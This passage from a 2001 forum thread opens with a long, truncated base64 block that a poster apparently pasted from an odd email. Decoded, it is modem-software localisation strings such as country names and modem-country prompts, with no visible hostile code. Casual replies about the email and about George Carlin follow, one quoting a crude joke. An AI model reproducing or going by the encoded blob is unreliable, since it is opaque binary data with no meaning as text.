    aQBhAAgAVABoAGEAaQBsAGEAbgBkAAUAVABvAGcAbwApAAUAVABvAG4AZwBhAAAAAABPAFMAZQB1
    ACAAbQBvAGQAZQBtACAAZQBzAHQA4QAgAGEAdAB1AGEAbABtAGUAbgB0AGUAIABjAG8AbgBmAGkA
    ZwB1AHIAYQBkAG8AIABwAGEAcgBhACAAJQBzACwAIAB2AG8AYwDqACAAYQBpAG4AZABhACAAcABl
    AHIAbQBhAG4AZQBjAGUAIABuAGUAcwB0AGUAIABwAGEA7QBzAD8AAAAtAEwAZQBtAGIAcgBlAHQA
    ZQAgAGQAYQAgAEMAbwBuAGYAaQBnAHUAcgBhAOcA4wBvACAAZABlACAAUABhAO0AcwAgAHAAYQBy
    AGEAIABvACAATQBvAGQAZQBtAEwAUwBlAHUAIABtAG8AZABlAG0AIABuAOMAbwAgAGUAcwB0AOEA
    IABjAG8AbgBmAGkAZwB1AHIAYQBkAG8AIABwAGEAcgBhACAAdQBtACAAcABhAO0AcwAuACAAVgBv
    AGMA6gAgAGQAZQBzAGUAagBhACAAYwBvAG4AZgBpAGcAdQByAOEALQBsAG8AIABhAGcAbwByAGEA
    PwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACABWAGkAZQB0ACAATgBhAG0AEQBXAGEAbABsAGkAcwAg
    AGEAbgBkACAARgB1AHQAdQBuAGEADQBXAGUAcwB0AGUAcgBuACAAUwBhAG0AbwBhABMAWQBlAG0A
    ZQBuACAAKABSAGUAcAB1AGIAbABpAGMAIABvAGYAKQATAFkAZQBtAGUAbgAgACgAUgBlAHAAdQBi
    AGwAaQBjACAAbwBmACkACgBZAHUAZwBvAHMAbABhAHYAaQBhAAUAWgBhAGkAcgBlAAYAWgBhAG0A
    YgBpAGEACABaAGkAbQBiAGEAYgB3AGUAEwBZAGUAbQBlAG4AIAAoAFIAZQBwAHUAYgBsAGkAYwAg
    AG8AZgApAAYAQwBhAHIAaQBiAGUABgBUAGEAaQB3AGEAbgAGAE4AZQBuAGgAdQBtAAAAAAAAABMA
    VAByAGkAbgBpAGQAYQBkACAAYQBuAGQAIABUAG8AYgBhAGcAbwAHAFQAdQBuAGkAcwBpAGEABgBU
    AHUAcgBrAGUAeQAYAFQAdQByAGsAcwAgAGEAbgBkACAAQwBhAGkAYwBvAHMAIABJAHMAbABhAG4A
    ZABzAAYAVAB1AHYAYQBsAHUABgBVAGcAYQBuAGQAYQAHAFUAawByAGEAaQBuAGUAFABVAG4AaQB0
    AGUAZAAgAEEAcgBhAGIAIABFAG0AaQByAGEAdABlAHMAAgBVAEsAAwBFAFUAQQAMAEIAdQByAGsA
    aQBuAGEAIABGAGEAcwBvAAcAVQByAHUAZwB1AGEAeQAGAFIAdQBzAHMAaQBhAAcAVgBhAG4AdQBh
    AHQAdQASAFYAYQB0AGkAYwBhAG4AIABDAGkAdAB5ACAAUwB0AGEAdABlAAkAVgBlAG4AZQB6AHUA
    ZQBsAGEAAAAIAEIAYQByAGIAYQBkAG8AcwAHAEIAZQBsAGcAaQB1AG0ABgBCAGUAbABpAHoAZQAT
    AEIAZQBuAGkAbgAgACgAUgBlAHAAdQBiAGwAaQBjACAAbwBmACkACABCAGUAcgBtAHUAZABhAHMA
    EwBCAGgAdQB0AGEAbgAgACgASwBpAG4AZwBkAG8AbQAgAG8AZgApAAcAQgBvAGwAaQB2AGkAYQAI
    AEIAbwB0AHMAdwBhAG4AYQAGAEIAcgBhAHoAaQBsABsAQgByAGkAdABpAHMAaAAgAEEAbgB0AGEA
    cgBjAHQAaQBjACAAVABlAHIAcgBpAHQAbwByAHkAHgBCAHIAaQB0AGkAcwBoACAASQBuAGQAaQBh
    AG4AIABPAGMAZQBhAG4AIABUAGUAcgByAGkAdABvAHIAeQAWAEIAcgBpAHQAaQBzAGgAIABWAGkA
    cgBnAGkAbgAgAEkAcwBsAGEAbgBkAHMAEQBCAHIAdQBuAGUAaQAgAEQAYQByAHUAcwBzAGEAbABh
    AG0ACABCAHUAbABnAGEAcgBpAGEAEgBNAHkAYQBuAG0AYQByACAAKABVAG4AaQBvAG4AIABvAGYA
    KQAHAEIAdQByAHUAbgBkAGkAAAALAEIAeQBlAGwAbwByAHUAcwBzAGkAYQAIAEMAYQBtAGUAcgBv
    AG8AbgAGAEMAYQBuAGEAZADhAAoAQwBhAHAAZQAgAFYAZQByAGQAZQAOAEMAYQB5AG0AYQBuACAA
    SQBzAGwAYQBuAGQAcwAYAEMAZQBuAHQAcgBhAGwAIABBAGYAcgBpAGMAYQBuACAAUgBlAHAAdQBi
    AGwAaQBjAAQAQwBoAGEAZAAFAEMAaABpAGwAZQAFAEMAaABpAG4AYQAIAEMAbwBsAG8AbQBiAGkA
    YQAHAEMAbwBtAG8AcgBvAHMABQBDAG8AbgBnAG8ADABDAG8AbwBrACAASQBzAGwAYQBuAGQAcwAK
    AEMAbwBzAHQAYQAgAFIAaQBjAGEABABDAHUAYgBhAAYAQwB5AHAAcgB1AHMAAAAhAEMAegBlAGMA
    aAAgAGEAbgBkACAAUwBsAG8AdgBhAGsAIABGAGUAZABlAHIAYQBsACAAUgBlAHAAdQBiAGwAaQBj
    AAgAQwBhAG0AYgBvAGQAaQBhACUARABlAG0AbwBjAHIAYQB0AGkAYwAgAFAAZQBvAHAAbABlACcA
    cwAgAFIAZQBwAHUAYgBsAGkAYwAgAG8AZgAgAEsAbwByAGUAYQAHAEQAZQBuAG0AYQByAGsACABE
    AGoAaQBiAG8AdQB0AGkAFABSAGUAcAD6AGIAbABpAGMAYQAgAEQAbwBtAGkAbgBpAGMAYQBuAGEA
    CABEAG8AbQBpAG4AaQBjAGEABwBFAGMAdQBhAGQAbwByAAUARQBnAHkAcAB0AAsARQBsACAAUwBh
    AGwAdgBhAGQAbwByABEARQBxAHUAYQB0AG8AcgBpAGEAbAAgAEcAdQBpAG4AZQBhAAgARQB0AGgA
    aQBvAHAAaQBhABAARgBhAGwAawBsAGEAbgBkACAASQBzAGwAYQBuAGQAcwAEAEYAaQBqAGkABwBG
    AGkAbgBsAGEAbgBkAAYARgByAGEAbgBjAGUAAAAAAAUASgBhAHAA4wBvAAcAQQBsAGIAYQBuAGkA
    YQAHAEEAbABnAGUAcgBpAGEADgBBAG0AZQByAGkAYwBhAG4AIABTAGEAbQBvAGEABwBHAGUAcgBt
    AGEAbgB5AAgAQQBuAGcAdQBpAGwAbABhABMAQQBuAHQAaQBnAHUAYQAgAGEAbgBkACAAQgBhAHIA
    YgB1AGQAYQAJAEEAcgBnAGUAbgB0AGkAbgBhAAkAQQBzAGMAZQBuAHMAaQBvAG4ACQBBAHUAcwB0
    AHIAYQBsAGkAYQAHAEEAdQBzAHQAcgBpAGEABwBCAGEAaABhAG0AYQBzAAcAQgBhAGgAcgBhAGkA
    bgAKAEIAYQBuAGcAbABhAGQAZQBzAGgAAAAGAEoAbwByAGQAYQBuAAUASwBlAG4AeQBhAAgASwBp
    AHIAaQBiAGEAdABpAAUASwBvAHIAZQBhAAYASwB1AHcAYQBpAHQAIgBMAGEAbwAgACgAUABlAG8A
    cABsAGUAJwBzACAARABlAG0AbwBjAHIAYQB0AGkAYwAgAFIAZQBwAHUAYgBsAGkAYwApAAcATABl
    AGIAYQBuAG8AbgAHAEwAZQBzAG8AdABoAG8ABwBMAGkAYgBlAHIAaQBhAAUATABpAGIAeQBhAA0A
    TABpAGUAYwBoAHQAZQBuAHMAdABlAGkAbgAJAEwAdQB4AGUAbQBiAG8AcgBnAAUATQBhAGMAYQBv
    AAoATQBhAGQAYQBnAGEAcwBjAGEAcgAIAE0AYQBsAGEAeQBzAGkAYQAGAE0AYQBsAGEAdwBpAAAA
    CABNAGEAbABkAGkAdgBlAHMABABNAGEAbABpAAAABQBNAGEAbAB0AGEACgBNAGEAdQByAGkAdABh
    AG4AaQBhAAkATQBhAHUAcgBpAHQAaQB1AHMABgBNAOkAeABpAGMAbwAGAE0AbwBuAGEAYwBvAAgA
    TQBvAG4AZwBvAGwAaQBhAAoATQBvAG4AdABzAGUAcgByAGEAdAAHAE0AbwByAG8AYwBjAG8ACgBN
    AG8AegBhAG0AYgBpAHEAdQBlAAUATgBhAHUAcgB1AAUATgBlAHAAYQBsAAsATgBlAHQAaABlAHIA
    bABhAG4AZABzABQATgBlAHQAaABlAHIAbABhAG4AZABzACAAQQBuAHQAaQBsAGwAZQBzAA0ATgBl
    AHcAIABDAGEAbABlAGQAbwBuAGkAYQALAE4AZQB3ACAAWgBlAGEAbABhAG4AZAAJAE4AaQBjAGEA
    cgDhAGcAdQBhAAAABQBOAGkAZwBlAHIABwBOAGkAZwBlAHIAaQBhAAYATgBvAHIAdwBhAHkABABP
    AG0AYQBuAAgAUABhAGsAaQBzAHQAYQBuAAYAUABhAG4AYQBtAOEAEABQAGEAcAB1AGEAIABOAGUA
    dwAgAEcAdQBpAG4AZQBhAAgAUABhAHIAYQBnAHUAYQB5AAQAUABlAHIAdQALAFAAaABpAGwAaQBw
    AHAAaQBuAGUAcwAGAFAAbwBsAGEAbgBkAAgAUABvAHIAdAB1AGcAYQBsABAARgByAGUAbgBjAGgA
    IABQAG8AbAB5AG4AZQBzAGkAYQAjAEYAcgBlAG4AYwBoACAAUwBvAHUAdABoAGUAcgBuACAAYQBu
    AGQAIABBAG4AdABhAHIAYwB0AGkAYwAgAEwAYQBuAGQAcwAFAEcAYQBiAG8AbgAGAEcAYQBtAGIA
    aQBhAB0ARwBlAHIAbQBhAG4AeQAgACgARgBlAGQAZQByAGEAbAAgAFIAZQBwAHUAYgBsAGkAYwAg
    AG8AZgApAAYAQQBuAGcAbwBsAGEABQBHAGgAYQBuAGEACQBHAGkAYgByAGEAbAB0AGEAcgAGAEcA
    cgBlAGUAYwBlAAcARwByAGUAbgBhAGQAYQAEAEcAdQBhAG0ACQBHAHUAYQB0AGUAbQBhAGwAYQAI
    AEcAdQBlAHIAbgBzAGUAeQAGAEcAdQBpAG4AZQBhAA0ARwB1AGkAbgBlAGEALQBCAGkAcwBzAGEA
    dQAHAEcAdQBhAHkAYQBuAGEAAAAFAEgAYQBpAHQAaQAIAEgAbwBuAGQAdQByAGEAcwAIAEgAbwBu
    AGcAawBvAG4AZwAVAEgAdQBuAGcAYQByAHkAIAAoAFIAZQBwAHUAYgBsAGkAYwAgAG8AZgApAAcA
    SQBjAGUAbABhAG4AZAAFAEkAbgBkAGkAYQAJAEkAbgBkAG8AbgBlAHMAaQBhABoASQByAGEAbgAg
    ACgASQBzAGwAYQBtAGkAYwAgAFIAZQBwAHUAYgBsAGkAYwAgAG8AZgApAAQASQByAGEAcQAHAEkA
    cgBlAGwAYQBuAGQABgBJAHMAcgBhAGUAbAAFAEkAdABhAGwAeQANAEMA9AB0AGUAIABkACcASQB2
    AG8AaQByAGUABwBKAGEAbQBhAGkAYwBhAAsAQQBmAGcAaABhAG4AaQBzAHQAYQBuAAYASgBlAHIA
    cwBlAHkACgBQAG8AcgB0AG8AIABSAGkAYwBvAAUAUQBhAHQAYQByAAcAUgBvAG0AYQBuAGkAYQAG
    AFIAdwBhAG4AZABhABUAUwBhAGkAbgB0ACAASwBpAHQAdABzACAAYQBuAGQAIABOAGUAdgBpAHMA
    CwBTAGEAaQBuAHQAIABDAHIAbwBpAHgAGgBTAGEAaQBuAHQAIABIAGUAbABlAG4AYQAgAGEAbgBk
    ACAAQQBzAGMAZQBuAHMAaQBvAG4ACwBTAGEAaQBuAHQAIABMAHUAYwBpAGEACgBTAGEAbgAgAE0A
    YQByAGkAbgBvAAwAUwBhAGkAbgB0ACAAVABoAG8AbQBhAHMAFQBTAGEAbwAgAFQAbwBtAOkAIABh
    AG4AZAAgAFAAcgBpAG4AYwBpAHAAZQAfAFMAYQBpAG4AdAAgAFYAaQBjAGUAbgB0ACAAYQBuAGQA
    IAB0AGgAZQAgAEcAcgBlAG4AYQBkAGkAbgBlAHMADABTAGEAdQBkAGkAIABBAHIAYQBiAGkAYQAH
    AFMAZQBuAGUAZwBhAGwACwBTAGUAeQBjAGgAZQBsAGwAZQBzACkADABTAGkAZQByAHIAYQAgAEwA
    ZQBvAG4AZQAAAAkAUwBpAG4AZwBhAHAAbwByAGUADwBTAG8AbABvAG0AbwBuACAASQBzAGwAYQBu
    AGQAcwAHAFMAbwBtAGEAbABpAGEADABTAG8AdQB0AGgAIABBAGYAcgBpAGMAYQAFAFMAcABhAGkA
    bgAJAFMAcgBpACAATABhAG4AawBhAAUAUwB1AGQAYQBuAAgAUwB1AHIAaQBuAGEAbQBlAAkAUwB3
    AGEAegBpAGwAYQBuAGQABgBTAHcAZQBkAGUAbgALAFMAdwBpAHQAegBlAHIAbABhAG4AZAAFAFMA
    eQByAGkAYQAIAFQAYQBuAHoAYQBuAGkAYQAIAFQAaABhAGkAbABhAG4AZAAFAFQAbwBnAG8AKQAF
    AFQAbwBuAGcAYQAAAAAAGACoYIR2eGXaZF9q7nZNUi2KmlsodbxlJQBzAAz/qGAvZiZUhJAoVxmQ
    C1ALV7ZbH/8AAA4ACWfclXhl2mRfagtXtlstippbhHbQY5KRCopvYEEAWQBvAHUAcgAgAG0AbwBk
    AGUAbQAgAGkAcwAgAG4AbwB0ACAAcwBlAHQAIABmAG8AcgAgAGEAbgB5ACAAYwBvAHUAbgB0AHIA
    eQAsACAAZABvACAAeQBvAHUAIAB3AGEAbgB0ACAAdABvACAAcwBlAHQAIABpAHQAIABuAG8AdwA/
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAVgBpAGUAdAAgAE4AYQBtABEAVwBhAGwAbABpAHMA
    IABhAG4AZAAgAEYAdQB0AHUAbgBhAA0AVwBlAHMAdABlAHIAbgAgAFMAYQBtAG8AYQATAFkAZQBt
    AGUAbgAgACgAUgBlAHAAdQBiAGwAaQBjACAAbwBmACkAEwBZAGUAbQBlAG4AIAAoAFIAZQBwAHUA
    YgBsAGkAYwAgAG8AZgApAAoAWQB1AGcAbwBzAGwAYQB2AGkAYQAFAFoAYQBpAHIAZQAGAFoAYQBt
    AGIAaQBhAAgAWgBpAG0AYgBhAGIAdwBlABMAWQBlAG0AZQBuACAAKABSAGUAcAB1AGIAbABpAGMA
    IABvAGYAKQADAKBS0lLUawIA8FNjcAEAIXEAAAAAAAATAFQAcgBpAG4AaQBkAGEAZAAgAGEAbgBk
    ACAAVABvAGIAYQBnAG8ABwBUAHUAbgBpAHMAaQBhAAYAVAB1AHIAawBlAHkAGABUAHUAcgBrAHMA
    IABhAG4AZAAgAEMAYQBpAGMAbwBzACAASQBzAGwAYQBuAGQAcwAGAFQAdQB2AGEAbAB1AAYAVQBn
    AGEAbgBkAGEABwBVAGsAcgBhAGkAbgBlABQAVQBuAGkAdABlAGQAIABBAHIAYQBiACAARQBtAGkA
    cgBhAHQAZQBzAAIAVQBLAAIAjn8LVwwAQgB1AHIAawBpAG4AYQAgAEYAYQBzAG8ABwBVAHIAdQBn
    AHUAYQB5AAYAUgB1AHMAcwBpAGEABwBWAGEAbgB1AGEAdAB1ABIAVgBhAHQAaQBjAGEAbgAgAEMA
    aQB0AHkAIABTAHQAYQB0AGUABADUWWdRXnTJYgAACABCAGEAcgBiAGEAZABvAHMABwBCAGUAbABn
    AGkAdQBtAAYAQgBlAGwAaQB6AGUAEwBCAGUAbgBpAG4AIAAoAFIAZQBwAHUAYgBsAGkAYwAgAG8A
    ZgApAAgAQgBlAHIAbQB1AGQAYQBzABMAQgBoAHUAdABhAG4AIAAoAEsAaQBuAGcAZABvAG0AIABv
    AGYAKQAHAEIAbwBsAGkAdgBpAGEACABCAG8AdABzAHcAYQBuAGEAAgD0XX+JGwBCAHIAaQB0AGkA
    cwBoACAAQQBuAHQAYQByAGMAdABpAGMAIABUAGUAcgByAGkAdABvAHIAeQAeAEIAcgBpAHQAaQBz
    AGgAIABJAG4AZABpAGEAbgAgAE8AYwBlAGEAbgAgAFQAZQByAHIAaQB0AG8AcgB5ABYAQgByAGkA
    dABpAHMAaAAgAFYAaQByAGcAaQBuACAASQBzAGwAYQBuAGQAcwARAEIAcgB1AG4AZQBpACAARABh
    AHIAdQBzAHMAYQBsAGEAbQAIAEIAdQBsAGcAYQByAGkAYQASAE0AeQBhAG4AbQBhAHIAIAAoAFUA
    bgBpAG8AbgAgAG8AZgApAAcAQgB1AHIAdQBuAGQAaQAAAAsAQgB5AGUAbABvAHIAdQBzAHMAaQBh
    AAgAQwBhAG0AZQByAG8AbwBuAAMAoFL/YidZCgBDAGEAcABlACAAVgBlAHIAZABlAA4AQwBhAHkA
    bQBhAG4AIABJAHMAbABhAG4AZABzABgAQwBlAG4AdAByAGEAbAAgAEEAZgByAGkAYwBhAG4AIABS
    AGUAcAB1AGIAbABpAGMABABDAGgAYQBkAAUAQwBoAGkAbABlAAUAQwBoAGkAbgBhAAgAQwBvAGwA
    bwBtAGIAaQBhAAcAQwBvAG0AbwByAG8AcwAFAEMAbwBuAGcAbwAMAEMAbwBvAGsAIABJAHMAbABh
    AG4AZABzAAUA5VSvZVSQzp6gUgQAQwB1AGIAYQAGAEMAeQBwAHIAdQBzAAAAIQBDAHoAZQBjAGgA
    IABhAG4AZAAgAFMAbABvAHYAYQBrACAARgBlAGQAZQByAGEAbAAgAFIAZQBwAHUAYgBsAGkAYwAI
    AEMAYQBtAGIAbwBkAGkAYQAlAEQAZQBtAG8AYwByAGEAdABpAGMAIABQAGUAbwBwAGwAZQAnAHMA
    IABSAGUAcAB1AGIAbABpAGMAIABvAGYAIABLAG8AcgBlAGEABwBEAGUAbgBtAGEAcgBrAAgARABq
    AGkAYgBvAHUAdABpAAcAGllzfDxcoFJxUYxUC1cIAEQAbwBtAGkAbgBpAGMAYQAEAIRT3HQaWT5y
    BQBFAGcAeQBwAHQABACphT5y5nQaWREARQBxAHUAYQB0AG8AcgBpAGEAbAAgAEcAdQBpAG4AZQBh
    AAgARQB0AGgAaQBvAHAAaQBhABAARgBhAGwAawBsAGEAbgBkACAASQBzAGwAYQBuAGQAcwAEAEYA
    aQBqAGkABwBGAGkAbgBsAGEAbgBkAAYARgByAGEAbgBjAGUAAAAAAAAAAgDlZSxnBwBBAGwAYgBh
    AG4AaQBhAAcAQQBsAGcAZQByAGkAYQAOAEEAbQBlAHIAaQBjAGEAbgAgAFMAYQBtAG8AYQAHAEcA
    ZQByAG0AYQBuAHkACABBAG4AZwB1AGkAbABsAGEAEwBBAG4AdABpAGcAdQBhACAAYQBuAGQAIABC
    AGEAcgBiAHUAZABhAAMAP5Y5aPdeCQBBAHMAYwBlAG4AcwBpAG8AbgAJAEEAdQBzAHQAcgBhAGwA
    aQBhAAcAQQB1AHMAdAByAGkAYQAHAEIAYQBoAGEAbQBhAHMABwBCAGEAaAByAGEAaQBuAAoAQgBh
    AG4AZwBsAGEAZABlAHMAaAAGAEoAbwByAGQAYQBuAAUASwBlAG4AeQBhAAgASwBpAHIAaQBiAGEA
    dABpAAUASwBvAHIAZQBhAAYASwB1AHcAYQBpAHQAIgBMAGEAbwAgACgAUABlAG8AcABsAGUAJwBz
    ACAARABlAG0AbwBjAHIAYQB0AGkAYwAgAFIAZQBwAHUAYgBsAGkAYwApAAcATABlAGIAYQBuAG8A
    bgAHAEwAZQBzAG8AdABoAG8ABwBMAGkAYgBlAHIAaQBhAAUATABpAGIAeQBhAA0ATABpAGUAYwBo
    AHQAZQBuAHMAdABlAGkAbgAJAEwAdQB4AGUAbQBiAG8AcgBnAAUATQBhAGMAYQBvAAoATQBhAGQA
    YQBnAGEAcwBjAGEAcgAIAE0AYQBsAGEAeQBzAGkAYQAGAE0AYQBsAGEAdwBpAAAACABNAGEAbABk
    AGkAdgBlAHMABABNAGEAbABpAAAABQBNAGEAbAB0AGEACgBNAGEAdQByAGkAdABhAG4AaQBhAAkA
    TQBhAHUAcgBpAHQAaQB1AHMAAgDwU2NwBgBNAG8AbgBhAGMAbwAIAE0AbwBuAGcAbwBsAGkAYQAK
    AE0AbwBuAHQAcwBlAHIAcgBhAHQABwBNAG8AcgBvAGMAYwBvAAoATQBvAHoAYQBtAGIAaQBxAHUA
    ZQAFAE4AYQB1AHIAdQAFAE4AZQBwAGEAbAALAE4AZQB0AGgAZQByAGwAYQBuAGQAcwAUAE4AZQB0
    AGgAZQByAGwAYQBuAGQAcwAgAEEAbgB0AGkAbABsAGUAcwANAE4AZQB3ACAAQwBhAGwAZQBkAG8A
    bgBpAGEACwBOAGUAdwAgAFoAZQBhAGwAYQBuAGQABAA8XKBSyWLcdAAABQBOAGkAZwBlAHIABwBO
    AGkAZwBlAHIAaQBhAAYATgBvAHIAdwBhAHkABABPAG0AYQBuAAgAUABhAGsAaQBzAHQAYQBuAAMA
    9F3/YqyZEABQAGEAcAB1AGEAIABOAGUAdwAgAEcAdQBpAG4AZQBhAAgAUABhAHIAYQBnAHUAYQB5
    AAIA2HlvmwsAUABoAGkAbABpAHAAcABpAG4AZQBzAAYAUABvAGwAYQBuAGQACABQAG8AcgB0AHUA
    ZwBhAGwAEABGAHIAZQBuAGMAaAAgAFAAbwBsAHkAbgBlAHMAaQBhACMARgByAGUAbgBjAGgAIABT
    AG8AdQB0AGgAZQByAG4AIABhAG4AZAAgAEEAbgB0AGEAcgBjAHQAaQBjACAATABhAG4AZABzAAUA
    RwBhAGIAbwBuAAYARwBhAG0AYgBpAGEAHQBHAGUAcgBtAGEAbgB5ACAAKABGAGUAZABlAHIAYQBs
    ACAAUgBlAHAAdQBiAGwAaQBjACAAbwBmACkABgBBAG4AZwBvAGwAYQAFAEcAaABhAG4AYQAJAEcA
    aQBiAHIAYQBsAHQAYQByAAYARwByAGUAZQBjAGUABwBHAHIAZQBuAGEAZABhAAQARwB1AGEAbQAE
    AHFTMFesmcliCABHAHUAZQByAG4AcwBlAHkABgBHAHUAaQBuAGUAYQANAEcAdQBpAG4AZQBhAC0A
    QgBpAHMAcwBhAHUABwBHAHUAYQB5AGEAbgBhAAUASABhAGkAdABpAAQAKm39kMlir2UIAEgAbwBu
    AGcAawBvAG4AZwAVAEgAdQBuAGcAYQByAHkAIAAoAFIAZQBwAHUAYgBsAGkAYwAgAG8AZgApAAcA
    SQBjAGUAbABhAG4AZAAFAEkAbgBkAGkAYQAJAEkAbgBkAG8AbgBlAHMAaQBhABoASQByAGEAbgAg
    ACgASQBzAGwAY

mental invalid - Rank: Dirty Dozen Crew - Messages:
  10. Dusty Lipschitz - Replied Dec 6, 2001

no problem roe
    call me crusty lipschitz, mystery solver...

11. beardo

beardo Guest

beardo - Replied Dec 6, 2001

hahaha was it really necessary to post all that?:D

12. mental invalid

mental invalid Dirty Dozen Crew

mental invalid - Replied Dec 6, 2001

...beards i figured that i had to show you guys the BIZARENESS of the email....it was really weird, i just scrolled and scrolled and scrolled and scrolled looking for the hidden message....weird! i tell ya, WEIRD!!:eek:

mental invalid - Rank: Dirty Dozen Crew - Messages:
  13. BIG T

BIG T 12oz Member

BIG T - Replied Dec 6, 2001

"i never fucked a 10 but i fucked 5 2's in one nite!" george's best:D :D :D

BIG T - Rank: 12oz Member - Messages:
  14. Zack Morris

Zack Morris 12oz Veteran Member

Zack Morris - Replied Dec 6, 2001

everything jesus..err I maen george carlin released on vinal my dad owned...now they are mine and no less than 5 feet away from me.

Zack Morris - Rank: 12oz Veteran Member - Messages:
  15. boogie hands

boogie hands 12oz Legend

boogie hands - Replied Dec 6, 2001

brick, brick, brick.....thats how george carlin be up against your reality check needing asses.....:D

this guy is great.....wonderful post.....makes me wish i had seen him when he came through town a while back.....

does anyone know if he still does small venues or is it just arenas and theaters.....

boogie hands - Rank: 12oz Legend - Messages: